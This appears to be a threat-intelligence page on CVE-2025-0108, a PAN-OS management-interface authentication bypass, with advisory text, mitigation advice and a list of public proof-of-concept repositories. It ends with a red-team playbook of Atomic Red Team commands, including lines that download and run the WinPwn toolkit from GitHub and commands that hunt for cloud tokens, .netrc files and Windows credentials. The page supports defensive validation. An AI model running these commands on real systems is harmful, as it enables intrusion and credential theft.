CVE-2025-0108
Overview
This vulnerability is an authentication bypass caused by path confusion between Nginx and Apache handlers in the PAN-OS management web interface. The root cause lies in inconsistent URL path processing, where double URL encoding combined with directory traversal allows bypassing authentication checks enforced by the X-pan-AuthCheck header. The affected component is the PAN-OS management web interface's PHP script invocation mechanism.
Vulnerability Description
An authentication bypass in the Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to bypass the authentication otherwise required by the PAN-OS management web interface and invoke certain PHP scripts. While invoking these PHP scripts does not enable remote code execution, it can negatively impact integrity and confidentiality of PAN-OS. You can greatly reduce the risk of this issue by restricting access to the management web interface to only trusted internal IP addresses according to our recommended best practices deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 . This issue does not affect Cloud NGFW or Prisma Access software.
Impact
An attacker with network access to the PAN-OS management interface can bypass authentication without any credentials or user interaction. This unauthorized access enables invocation of sensitive PHP scripts, compromising the integrity and confidentiality of the firewall configuration and management data. Although remote code execution is not possible, attackers can manipulate firewall settings or extract sensitive information, potentially undermining the security posture of the protected network.
Solution
Palo Alto Networks recommends applying the security updates detailed in their advisory at https://security.paloaltonetworks.com/CVE-2025-0108, which addresses this authentication bypass. Specifically, ensure PAN-OS is updated to version 10.1.14 or later. Additionally, restrict management interface access to trusted internal IP addresses following the deployment guidelines at https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 to mitigate exposure risk.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Palo Alto Networks PAN-OS software allows an unauthenticated attacker with network access to the management web interface to bypass authentication controls. This flaw enables the invocation of specific PHP scripts, which, while not directly facilitating remote code execution, poses significant risks to the integrity and confidentiality of the system. The management web interface is a critical component of PAN-OS, responsible for the configuration and monitoring of security policies. By exploiting this vulnerability, attackers can manipulate the system's behavior or access sensitive information, potentially leading to unauthorized changes in firewall rules or exposure of confidential data.
Attack vectors for this vulnerability are primarily network-based, targeting the management interface of PAN-OS. An attacker could leverage this flaw by scanning for accessible management interfaces on devices running vulnerable versions of the software. Once identified, the attacker can send crafted requests to invoke PHP scripts without needing valid credentials. This could lead to scenarios where an attacker gains insight into the configuration of the firewall, modifies security settings, or extracts sensitive information, all without raising alarms. The ease of exploitation, combined with the high severity of the vulnerability, underscores the potential for widespread impact if left unaddressed.
The real-world implications of this vulnerability are profound, particularly for organizations relying on Palo Alto Networks for their cybersecurity infrastructure. An attacker exploiting this flaw could lead to unauthorized access to sensitive data, manipulation of security policies, and ultimately, a breach of organizational security. The potential for data loss, regulatory fines, and reputational damage poses a significant business risk. Organizations may face operational disruptions as they scramble to respond to the fallout from an attack, leading to financial losses and diminished customer trust. Furthermore, the high CVSS score indicates that the vulnerability is critical, necessitating immediate attention from security teams.
Detection of this vulnerability requires a combination of network monitoring and vulnerability scanning. Organizations should implement intrusion detection systems (IDS) to identify unauthorized access attempts to the management interface. Regular vulnerability assessments can help identify systems running affected versions of PAN-OS. Additionally, logging and monitoring of management interface access can provide insights into potential exploitation attempts. It is crucial for organizations to establish a baseline of normal activity on their management interfaces to detect anomalies effectively.
Mitigation strategies include restricting access to the management web interface to trusted internal IP addresses, as recommended by Palo Alto Networks. Implementing network segmentation can further isolate the management interface from untrusted networks, reducing the attack surface. Organizations should also ensure that they are running the latest versions of PAN-OS, as updates often include patches for known vulnerabilities. Regular security training for personnel managing the firewall can help in recognizing and responding to potential threats, fostering a proactive security culture. By adopting these measures, organizations can significantly reduce the risk associated with this vulnerability and enhance their overall security posture.
CSURFACE threat intelligence has identified a slight increase in detection activity related to CVE-2025-0108, indicating a modest rise in attempts to exploit the authentication bypass vulnerability in Palo Alto Networks PAN-OS. While the overall exploit trend remains stable without a rapid escalation, the emergence of multiple new proof-of-concept tools on public repositories suggests growing interest and accessibility for threat actors to test or leverage this vulnerability. This development underscores a persistent risk to the integrity and confidentiality of affected systems, particularly in environments where management interfaces are insufficiently segmented or exposed. Although ransomware usage linked to this vulnerability remains unknown, the increased visibility of exploitation attempts warrants heightened vigilance. Consequently, the threat level should be considered sustained at a critical posture, with a potential for escalation if exploitation activity intensifies or if adversaries integrate this vulnerability into broader attack campaigns.
Affected Products (151)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.1.14 |
cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.1.14 |
cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h1:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.1.14 |
cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h2:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.1.14 |
cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h3:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.1.14 |
cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h4:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.1.14 |
cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h5:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.1.14 |
cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h6:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.1.14 |
cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h7:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.1.14 |
cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h8:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.7 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.7 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h1:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.7 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h10:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.7 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h11:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.7 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h12:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.7 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h13:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.7 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h14:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (7)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
iSee857/CVE-2025-0108-PoC
Palo Alto Networks PAN-OS 身份验证绕过漏洞批量检测脚本(CVE-2025-0108)
|
iSee857 | 32 | 20 | 2025-02-13 | View |
|
FOLKS-iwd/CVE-2025-0108-PoC
PoC exploit for CVE-2025-0108 - PAN-OS Authentication Bypass
|
FOLKS-iwd | 8 | 2 | 2025-02-14 | View |
|
becrevex/CVE-2025-0108
NSE script that checks for CVE-2025-0108 vulnerability in Palo Alto Networks PAN-OS
|
becrevex | 2 | 0 | 2025-02-19 | View |
|
fr4nc1stein/CVE-2025-0108-SCAN
Detects an authentication bypass vulnerability in Palo Alto PAN-OS (CVE-2025-0108).
|
fr4nc1stein | 2 | 0 | 2025-02-18 | View |
|
sohaibeb/CVE-2025-0108
PAN-OS CVE POC SCRIPT
|
sohaibeb | 1 | 0 | 2025-02-19 | View |
|
barcrange/CVE-2025-0108-Authentication-Bypass-checker
|
barcrange | 0 | 0 | 2025-02-19 | View |
|
kso4more/CVE-2025-0108
|
kso4more | 0 | 0 | 2025-10-25 | View |
Threat Feed
32 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.